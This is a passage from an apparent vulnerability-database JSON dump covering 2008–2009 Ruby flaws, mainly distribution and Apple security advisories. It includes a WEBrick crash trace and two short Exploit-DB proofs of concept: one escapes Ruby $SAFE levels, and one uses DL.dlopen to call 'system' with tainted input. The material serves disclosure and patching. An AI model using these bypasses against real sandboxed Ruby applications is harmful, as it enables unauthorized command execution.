/usr/lib/ruby/1.8/webrick/httprequest.rb:86:in `parse'\n 
/usr/lib/ruby/1.8/webrick/httpserver.rb:56:in `run'\n /usr/lib/ruby/1.8/webrick/server.rb:173:in `start_thread'\n /usr/lib/ruby/1.8/webrick/server.rb:162:in `start'\n /usr/lib/ruby/1.8/webrick/server.rb:162:in `start_thread'\n /usr/lib/ruby/1.8/webrick/server.rb:95:in `start'\n /usr/lib/ruby/1.8/webrick/server.rb:92:in `each'\n /usr/lib/ruby/1.8/webrick/server.rb:92:in `start'\n /usr/lib/ruby/1.8/webrick/server.rb:23:in `start'\n /usr/lib/ruby/1.8/webrick/server.rb:82:in `start'\n /home/audit/instiki-0.13.0/vendor/rails/railties/lib/webrick_server.rb:63:in `dispatch'\n script/server:62\n[FATAL] failed to allocate memory\nroot@audit:/home/audit#\n\n=====\n5)Credits\n=====\n\nlaurent gaffi\u00e9\n\nlaurent.gaffie{remove_this}[at]gmail[dot]com\n\n# milw0rm.com [2008-08-13]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6239/"}, {"lastseen": "2016-02-03T16:28:49", "bulletinFamily": "exploit", "description": "Ruby 1.9 Safe Level Multiple Function Restriction Bypass. CVE-2008-3655 . Remote exploits for multiple platform", "modified": "2008-08-11T00:00:00", "published": "2008-08-11T00:00:00", "id": "EDB-ID:32224", "href": "https://www.exploit-db.com/exploits/32224/", "type": "exploitdb", "title": "Ruby <= 1.9 Safe Level Multiple Function Restriction Bypass", "sourceData": "source: http://www.securityfocus.com/bid/30644/info\r\n \r\nRuby is prone to multiple vulnerabilities that can be leveraged to bypass security restrictions or cause a denial of service:\r\n \r\n- Multiple security-bypass vulnerabilities occur because of errors in the 'safe level' restriction implementation. 
Attackers can leverage these issues to make insecure function calls and perform 'Syslog' operations.\r\n \r\n- An error affecting 'WEBrick::HTTP::DefaultFileHandler' can exhaust system resources and deny service to legitimate users.\r\n \r\n- A flaw in 'dl' can allow attackers to call unauthorized functions.\r\n \r\nAttackers can exploit these issues to perform unauthorized actions on affected applications. This may aid in compromising the application and possibly the underlying computers. Attackers can also cause denial-of-service conditions.\r\n \r\nThese issues affect Ruby 1.8.5, 1.8.6-p286, 1.8.7-p71, and 1.9 r18423. Prior versions are also vulnerable. \r\n\r\nclass Hello\r\n def world\r\n Thread.new do\r\n $SAFE = 4\r\n msg = \"Hello, World!\"\r\n def msg.size\r\n self.replace self*10 # replace string\r\n 1 # return wrong size\r\n end\r\n msg\r\n end.value\r\n end\r\nend\r\n\r\n$SAFE = 1 # or 2, or 3\r\ns = Hello.new.world\r\nif s.kind_of?(String)\r\n puts s if s.size < 20 # print string which size is less than 20\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/32224/"}, {"lastseen": "2016-02-03T16:28:40", "bulletinFamily": "exploit", "description": "Ruby 1.9 dl Module DL.dlopen Arbitrary Library Access. CVE-2008-3655,CVE-2008-3657. Remote exploits for multiple platform", "modified": "2008-08-11T00:00:00", "published": "2008-08-11T00:00:00", "id": "EDB-ID:32223", "href": "https://www.exploit-db.com/exploits/32223/", "type": "exploitdb", "title": "Ruby <= 1.9 dl Module DL.dlopen Arbitrary Library Access", "sourceData": "source: http://www.securityfocus.com/bid/30644/info\r\n \r\nRuby is prone to multiple vulnerabilities that can be leveraged to bypass security restrictions or cause a denial of service:\r\n \r\n- Multiple security-bypass vulnerabilities occur because of errors in the 'safe level' restriction implementation. 
Attackers can leverage these issues to make insecure function calls and perform 'Syslog' operations.\r\n \r\n- An error affecting 'WEBrick::HTTP::DefaultFileHandler' can exhaust system resources and deny service to legitimate users.\r\n \r\n- A flaw in 'dl' can allow attackers to call unauthorized functions.\r\n \r\nAttackers can exploit these issues to perform unauthorized actions on affected applications. This may aid in compromising the application and possibly the underlying computers. Attackers can also cause denial-of-service conditions.\r\n \r\nThese issues affect Ruby 1.8.5, 1.8.6-p286, 1.8.7-p71, and 1.9 r18423. Prior versions are also vulnerable. \r\n\r\nrequire 'dl'\r\n$SAFE = 1\r\nh = DL.dlopen(nil)\r\nsys = h.sym('system', 'IP')\r\nuname = 'uname -rs'.taint\r\nsys[uname]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/32223/"}], "ubuntu": [{"lastseen": "2019-05-29T17:23:17", "bulletinFamily": "unix", "description": "Laurent Gaffie discovered that Ruby did not properly check for memory allocation failures. If a user or automated system were tricked into running a malicious script, an attacker could cause a denial of service. (CVE-2008-3443)\n\nThis update also fixes a regression in the upstream patch previously applied to fix CVE-2008-3790. The regression would cause parsing of some XML documents to fail.", "modified": "2008-12-16T00:00:00", "published": "2008-12-16T00:00:00", "id": "USN-691-1", "href": "https://usn.ubuntu.com/691-1/", "title": "Ruby vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T17:22:12", "bulletinFamily": "unix", "description": "Akira Tagoh discovered a vulnerability in Ruby which led to an integer overflow. 
If a user or automated system were tricked into running a malicious script, an attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-2376)\n\nLaurent Gaffie discovered that Ruby did not properly check for memory allocation failures. If a user or automated system were tricked into running a malicious script, an attacker could cause a denial of service. (CVE-2008-3443)\n\nKeita Yamaguchi discovered several safe level vulnerabilities in Ruby. An attacker could use this to bypass intended access restrictions. (CVE-2008-3655)\n\nKeita Yamaguchi discovered that WEBrick in Ruby did not properly validate paths ending with \u201c.\u201d. A remote attacker could send a crafted HTTP request and cause a denial of service. (CVE-2008-3656)\n\nKeita Yamaguchi discovered that the dl module in Ruby did not check the taintness of inputs. An attacker could exploit this vulnerability to bypass safe levels and execute dangerous functions. (CVE-2008-3657)\n\nLuka Treiber and Mitja Kolsek discovered that REXML in Ruby did not always use expansion limits when processing XML documents. If a user or automated system were tricked into opening a crafted XML file, an attacker could cause a denial of service via CPU consumption. (CVE-2008-3790)\n\nJan Lieskovsky discovered several flaws in the name resolver of Ruby. A remote attacker could exploit this to spoof DNS entries, which could lead to misdirected traffic. This is a different vulnerability from CVE-2008-1447. 
(CVE-2008-3905)", "modified": "2008-10-10T00:00:00", "published": "2008-10-10T00:00:00", "id": "USN-651-1", "href": "https://usn.ubuntu.com/651-1/", "title": "Ruby vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "description": "\nThe official ruby site reports:\n\nSeveral vulnerabilities in safe level have been discovered:\n\nuntrace_var is permitted at safe level 4;\n$PROGRAM_NAME may be modified at safe level 4;\ninsecure methods may be called at safe level 1-3;\nsyslog operations are permitted at safe level 4;\ndl doesn't check taintness, so it could allow attackers\n\t to call dangerous functions.\n\n\n", "modified": "2010-05-12T00:00:00", "published": "2008-08-08T00:00:00", "id": "C329712A-6B5B-11DD-9D79-001FC61C2A55", "href": "https://vuxml.freebsd.org/freebsd/c329712a-6b5b-11dd-9d79-001fc61c2a55.html", "title": "ruby -- multiple vulnerabilities in safe level", "type": "freebsd", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "description": "\nThe official ruby site reports:\n\nWEBrick::HTTP::DefaultFileHandler is faulty of exponential time\n\t taking requests due to a backtracking regular expression in\n\t WEBrick::HTTPUtils.split_header_value.\n\n", "modified": "2010-05-12T00:00:00", "published": "2008-08-08T00:00:00", "id": "F7BA20AA-6B5A-11DD-9D79-001FC61C2A55", "href": "https://vuxml.freebsd.org/freebsd/f7ba20aa-6b5a-11dd-9d79-001fc61c2a55.html", "title": "ruby -- DoS vulnerability in WEBrick", "type": "freebsd", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:52:34", "bulletinFamily": "unix", "description": "The DHCP client (dhclient) could be crashed by a malicious DHCP server sending an overlong subnet field (CVE-2009-0692). 
In theory a malicious DHCP server could exploit the flaw to execute arbitrary code as root on machines using dhclient to obtain network settings. Newer distributions (SLES10+, openSUSE) do have buffer overflow checking that guards against this kind of stack overflow though. So actual exploitability is rather unlikely.\n#### Solution\nThere is no known workaround, please install the update packages.", "modified": "2009-07-15T16:27:03", "published": "2009-07-15T16:27:03", "id": "SUSE-SA:2009:037", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-07/msg00003.html", "type": "suse", "title": "remote code execution in dhcp-client", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:07", "bulletinFamily": "unix", "description": "### Background\n\nRuby is an interpreted object-oriented programming language. The elaborate standard library includes an HTTP server (\"WEBRick\") and a class for XML parsing (\"REXML\"). \n\n### Description\n\nMultiple vulnerabilities have been discovered in the Ruby interpreter and its standard libraries. 
Drew Yao of Apple Product Security discovered the following flaws: \n\n * Arbitrary code execution or Denial of Service (memory corruption) in the rb_str_buf_append() function (CVE-2008-2662).\n * Arbitrary code execution or Denial of Service (memory corruption) in the rb_ary_store() function (CVE-2008-2663).\n * Memory corruption via alloca in the rb_str_format() function (CVE-2008-2664).\n * Memory corruption (\"REALLOC_N\") in the rb_ary_splice() and rb_ary_replace() functions (CVE-2008-2725).\n * Memory corruption (\"beg + rlen\") in the rb_ary_splice() and rb_ary_replace() functions (CVE-2008-2726).\n\nFurthermore, several other vulnerabilities have been reported: \n\n * Tanaka Akira reported an issue with resolv.rb that enables attackers to spoof DNS responses (CVE-2008-1447).\n * Akira Tagoh of RedHat discovered a Denial of Service (crash) issue in the rb_ary_fill() function in array.c (CVE-2008-2376).\n * Several safe level bypass vulnerabilities were discovered and reported by Keita Yamaguchi (CVE-2008-3655).\n * Christian Neukirchen is credited for discovering a Denial of Service (CPU consumption) attack in the WEBRick HTTP server (CVE-2008-3656).\n * A fault in the dl module allowed the circumvention of taintness checks which could possibly lead to insecure code execution was reported by \"sheepman\" (CVE-2008-3657).\n * Tanaka Akira again found a DNS spoofing vulnerability caused by the resolv.rb implementation using poor randomness (CVE-2008-3905).\n * Luka Treiber and Mitja Kolsek (ACROS Security) disclosed a Denial of Service (CPU consumption) vulnerability in the REXML module when dealing with recursive entity expansion (CVE-2008-3790).\n\n### Impact\n\nThese vulnerabilities allow remote attackers to execute arbitrary code, spoof DNS responses, bypass Ruby's built-in security and taintness checks, and cause a Denial of Service via crash or CPU exhaustion. \n\n### Workaround\n\nThere is no known workaround at this time. 
\n\n### Resolution\n\nAll Ruby users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/ruby-1.8.6_p287-r1\"", "modified": "2008-12-16T00:00:00", "published": "2008-12-16T00:00:00", "id": "GLSA-200812-17", "href": "https://security.gentoo.org/glsa/200812-17", "type": "gentoo", "title": "Ruby: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "description": "About the security content of Security Update 2009-002 / Mac OS X v10.5.7\r\n\r\n * Last Modified: May 12, 2009\r\n * Article: HT3549\r\n\r\nSummary\r\n\r\nThis document describes the security content of Security Update 2009-002 / Mac OS X v10.5.7, which can be downloaded and installed via Software Update preferences, or from Apple Downloads.\r\n\r\nFor the protection of our customers, Apple does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches or releases are available. To learn more about Apple Product Security, see the Apple Product Security website.\r\n\r\nFor information about the Apple Product Security PGP Key, see "How to use the Apple Product Security PGP Key."\r\n\r\nWhere possible, CVE IDs are used to reference the vulnerabilities for further information.\r\n\r\nTo learn about other Security Updates, see "Apple Security Updates."\r\nProducts Affected\r\n\r\nProduct Security, Mac OS X 10.5\r\nSecurity Update 2009-002 / Mac OS X v10.5.7\r\n\r\n *\r\n\r\n Apache\r\n\r\n CVE-ID: CVE-2008-2939\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11\r\n\r\n Impact: Visiting a malicious website via a proxy may result in cross-site scripting\r\n\r\n Description: An input validation issue exists in Apache's handling of FTP proxy requests containing wildcard characters. 
Visiting a malicious website via an Apache proxy may result in a cross-site scripting attack. This update addresses the issue by applying the Apache patch for version 2.0.63. Further information is available via the Apache web site at http://httpd.apache.org/ Apache 2.0.x is only shipped with Mac OS X Server v10.4.x systems. Mac OS X v10.5.x and Mac OS X Server v10.5.x ship with Apache 2.2.x.\r\n\r\n *\r\n\r\n Apache\r\n\r\n CVE-ID: CVE-2008-2939\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Visiting a malicious website via a proxy may result in cross-site scripting\r\n\r\n Description: An input validation issue exists in Apache 2.2.9's handling of FTP proxy requests containing wildcard characters. Visiting a malicious website via an Apache proxy may result in a cross-site scripting attack. This update addresses the issue by updating Apache to version 2.2.11. Further information is available via the Apache web site at http://httpd.apache.org/\r\n\r\n *\r\n\r\n Apache\r\n\r\n CVE-ID: CVE-2008-0456\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Web sites that allow users to control the name of a served file may be vulnerable to HTTP response injection\r\n\r\n Description: A request forgery issue exists in Apache. Apache does not escape filenames when negotiating the correct content type to send to a remote browser. A user who can publish files with specially crafted names to a web site can substitute their own response for any web page hosted on the system. 
This update addresses the issue by escaping filenames in content negotiation responses.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2009-0154\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded CFF font may lead to arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in Apple Type Services' handling of Compact Font Format (CFF) fonts. Viewing or downloading a document containing a maliciously crafted embedded CFF font may lead to arbitrary code execution. This update addresses the issue through improved bounds checking. Credit to Charlie Miller of Independent Security Evaluators working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n BIND\r\n\r\n CVE-ID: CVE-2009-0025\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: BIND is susceptible to a spoofing attack if configured to use DNSSEC\r\n\r\n Description: BIND incorrectly checks the return value of the OpenSSL DSA_do_verify function. On systems using the DNS Security Extensions (DNSSEC) protocol, a maliciously crafted DSA certificate could bypass the validation, which may lead to a spoofing attack. By default, DNSSEC is not enabled. This update addresses the issue by updating BIND to version 9.3.6-P1 on Mac OS X v10.4, and version 9.4.3-P1 for Mac OS X v10.5 systems. 
Further information is available via the ISC web site at https://www.isc.org/\r\n\r\n *\r\n\r\n CFNetwork\r\n\r\n CVE-ID: CVE-2009-0144\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Applications that use CFNetwork may send secure cookies in unencrypted HTTP requests\r\n\r\n Description: An implementation issue exists in CFNetwork's parsing of Set-Cookie headers, which may result in certain cookies being unexpectedly sent over a non-encrypted connection. This issue affects non-RFC compliant Set-Cookie headers that are accepted for compatibility reasons. This may result in applications that use CFNetwork, such as Safari, sending sensitive information in unencrypted HTTP requests. This update addresses the issue through improved parsing of Set-Cookie headers. This issue does not affect systems prior to Mac OS X v10.5. Credit to Andrew Mortensen of the University of Michigan for reporting this issue.\r\n\r\n *\r\n\r\n CFNetwork\r\n\r\n CVE-ID: CVE-2009-0157\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Visiting a malicious website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in the handling of overly long HTTP headers in CFNetwork. Visiting a malicious website may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation of HTTP headers. This issue does not affect systems prior to Mac OS X v10.5. 
Credit to Moritz Jodeit of n.runs AG for reporting this issue.\r\n\r\n *\r\n\r\n CoreGraphics\r\n\r\n CVE-ID: CVE-2009-0145\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: Multiple memory corruption issues exist in CoreGraphics' handling of PDF files. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. This update addresses the issues through improved bounds and error checking.\r\n\r\n *\r\n\r\n CoreGraphics\r\n\r\n CVE-ID: CVE-2009-0155\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An integer underflow in CoreGraphics' handling of PDF files may result in a heap buffer overflow. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.5. Credit to Barry K. Nathan for reporting this issue.\r\n\r\n *\r\n\r\n CoreGraphics\r\n\r\n CVE-ID: CVE-2009-0146, CVE-2009-0147, CVE-2009-0165\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Viewing or downloading a PDF file containing a maliciously crafted JBIG2 stream may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: Multiple heap buffer overflows exist in CoreGraphics' handling of PDF files containing JBIG2 streams. 
Viewing or downloading a PDF file containing a maliciously crafted JBIG2 stream may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Credit to Apple, Alin Rad Pop of Secunia Research, and Will Dormann of CERT/CC for reporting this issue.\r\n\r\n *\r\n\r\n Cscope\r\n\r\n CVE-ID: CVE-2009-0148\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Processing a maliciously crafted source file with Cscope may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in Cscope's handling of long file system path names. Using Cscope to process a maliciously crafted source file may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking.\r\n\r\n *\r\n\r\n CUPS\r\n\r\n CVE-ID: CVE-2009-0164\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Visiting a maliciously crafted web site may lead to unauthorized access of the Web Interface of CUPS\r\n\r\n Description: Under certain circumstances, the Web Interface of CUPS 1.3.9 and earlier may be accessible to attackers through DNS rebinding attacks. In the default configuration, this may allow a maliciously crafted website to start and stop printers, and access information about printers and jobs. This update addresses the issue by performing additional validation of the Host header. 
Credit: Apple.\r\n\r\n *\r\n\r\n Disk Images\r\n\r\n CVE-ID: CVE-2009-0150\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Mounting a maliciously crafted disk image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in the handling of disk images. Mounting a maliciously crafted sparse disk image may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.5. Credit to Tiller Beauchamp of IOActive for reporting this issue.\r\n\r\n *\r\n\r\n Disk Images\r\n\r\n CVE-ID: CVE-2009-0149\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Mounting a maliciously crafted disk image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: Multiple memory corruption issues exist in the handling of disk images. Mounting a maliciously crafted sparse disk image may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n enscript\r\n\r\n CVE-ID: CVE-2004-1184, CVE-2004-1185, CVE-2004-1186, CVE-2008-3863\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Multiple vulnerabilities in enscript\r\n\r\n Description: enscript is updated to version 1.6.4 to address several vulnerabilities, the most serious of which may lead to arbitrary code execution. 
Further information is available via the gnu web site at http://www.gnu.org/software/enscript/\r\n\r\n *\r\n\r\n Flash Player plug-in\r\n\r\n CVE-ID: CVE-2009-0519, CVE-2009-0520, CVE-2009-0114\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Multiple vulnerabilities in Adobe Flash Player plug-in\r\n\r\n Description: Multiple issues exist in the Adobe Flash Player plug-in, the most serious of which may lead to arbitrary code execution when viewing a maliciously crafted web site. The issues are addressed by updating the Flash Player plug-in on Mac OS v10.5.x systems to version 10.0.22.87, and to version 9.0.159.0 on Mac OS X v10.4.11 systems. Further information is available via the Adobe web site at http://www.adobe.com/support/security/bulletins/apsb09-01.html\r\n\r\n *\r\n\r\n Help Viewer\r\n\r\n CVE-ID: CVE-2009-0942\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Accessing a maliciously crafted "help:" URL may lead to arbitrary code execution\r\n\r\n Description: Help Viewer loads Cascading Style Sheets referenced in URL parameters without validating that the referenced style sheets are located within a registered help book. A malicious "help:" URL may be used to invoke arbitrary AppleScript files, which may lead to arbitrary code execution. This update addresses the issue through improved validation of file system paths when loading stylesheets. 
Credit to Brian Mastenbrook for reporting this issue.\r\n\r\n *\r\n\r\n Help Viewer\r\n\r\n CVE-ID: CVE-2009-0943\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Accessing a maliciously crafted "help:" URL may lead to arbitrary code execution\r\n\r\n Description: Help Viewer does not validate that full paths to HTML documents are within registered help books. A malicious "help:" URL may be used to invoke arbitrary AppleScript files, which may lead to arbitrary code execution. This update addresses the issue through improved validation of "help:" URLs. Credit to Brian Mastenbrook for reporting this issue.\r\n\r\n *\r\n\r\n iChat\r\n\r\n CVE-ID: CVE-2009-0152\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: iChat AIM communications configured for SSL may downgrade to plaintext\r\n\r\n Description: iChat supports Secure Sockets Layer (SSL) for AOL Instant Messenger and Jabber accounts. iChat automatically disables SSL for AOL Instant Messenger accounts when it is unable to connect, and sends subsequent communications in plain text until SSL is manually re-enabled. A remote attacker with the ability to observe network traffic from an affected system may obtain the contents of AOL Instant Messenger conversations. This update addresses the issue by changing the behavior of iChat to always attempt to use SSL, and to use less secure channels only if the "Require SSL" preference is not enabled. 
This issue does not affect systems prior to Mac OS X v10.5, as they do not support SSL for iChat accounts.\r\n\r\n *\r\n\r\n International Components for Unicode\r\n\r\n CVE-ID: CVE-2009-0153\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Maliciously crafted content may bypass website filters and result in cross-site scripting\r\n\r\n Description: An implementation issue exists in ICU's handling of certain character encodings. Using ICU to convert invalid byte sequences to Unicode may result in over-consumption, where trailing bytes are considered part of the original character. This may be leveraged by an attacker to bypass filters on websites that attempt to mitigate cross-site scripting. This update addresses the issue through improved handling of invalid byte sequences. This issue does not affect systems prior to Mac OS X v10.5. Credit to Chris Weber of Casaba Security for reporting this issue.\r\n\r\n *\r\n\r\n IPSec\r\n\r\n CVE-ID: CVE-2008-3651, CVE-2008-3652\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Multiple vulnerabilities in the racoon daemon may lead to a denial of service\r\n\r\n Description: Multiple memory leaks exist in the racoon daemon in ipsec-tools before 0.7.1, which may lead to a denial of service. This update addresses the issues through improved memory management.\r\n\r\n *\r\n\r\n Kerberos\r\n\r\n CVE-ID: CVE-2009-0845\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Processing a maliciously crafted authentication packet may lead to a denial of service of a Kerberos-enabled program\r\n\r\n Description: A null pointer dereference issue exists in the Kerberos SPNEGO support. Processing a maliciously crafted authentication packet may lead to a denial of service of a Kerberos-enabled program. 
This update addresses the issue by adding a check for a null pointer. This issue does not affect systems prior to Mac OS X v10.5.\r\n\r\n *\r\n\r\n Kerberos\r\n\r\n CVE-ID: CVE-2009-0846, CVE-2009-0847\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Processing a maliciously crafted ASN.1 encoded message may lead to a denial of service of a Kerberos-enabled program or arbitrary code execution\r\n\r\n Description: Multiple memory corruption issues exist in Kerberos' handling of ASN.1 encoded messages. Processing a maliciously crafted ASN.1 encoded message may lead to a denial of service of a Kerberos-enabled program or arbitrary code execution. Further information on the issues and the patches applied is available via the MIT Kerberos website at http://web.mit.edu/Kerberos/\r\n\r\n *\r\n\r\n Kerberos\r\n\r\n CVE-ID: CVE-2009-0844\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Processing a maliciously crafted Kerberos data packet may lead to a denial of service of a Kerberos-enabled program\r\n\r\n Description: An out-of-bounds memory access exists in Kerberos. Processing a maliciously crafted Kerberos data packet may lead to a denial of service of a Kerberos-enabled program. This update addresses the issue through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.5. Credit: Apple.\r\n\r\n *\r\n\r\n Kernel\r\n\r\n CVE-ID: CVE-2008-1517\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: A local user may obtain system privileges\r\n\r\n Description: An unchecked index issue exists in the kernel's handling of workqueues, which may lead to an unexpected system shutdown or arbitrary code execution with Kernel privileges. This update addresses the issue through improved index checking. 
Credit to an anonymous researcher working with Verisign iDefense VCP for reporting this issue.\r\n\r\n *\r\n\r\n Launch Services\r\n\r\n CVE-ID: CVE-2009-0156\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Downloading a maliciously crafted Mach-O executable may cause Finder to repeatedly terminate and relaunch\r\n\r\n Description: An out-of-bounds memory read access exists in Launch Services. Downloading a maliciously crafted Mach-O executable may cause the Finder to repeatedly terminate and relaunch. This update addresses the issue through improved bounds checking.\r\n\r\n *\r\n\r\n libxml\r\n\r\n CVE-ID: CVE-2008-3529\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in libxml's handling of long entity names. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking.\r\n\r\n *\r\n\r\n Net-SNMP\r\n\r\n CVE-ID: CVE-2008-4309\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: A remote attacker may terminate the operation of the SNMP service\r\n\r\n Description: An integer overflow exists in the netsnmp_create_subtree_cache function. By sending a maliciously crafted SNMPv3 packet, an attacker may cause the SNMP server to terminate, denying service to legitimate clients. This update addresses the issue by applying the Net-SNMP patches on Mac OS X v10.4.11 systems, and by updating net_snmp to version 5.4.2.1 on Mac OS X v10.5.x systems. 
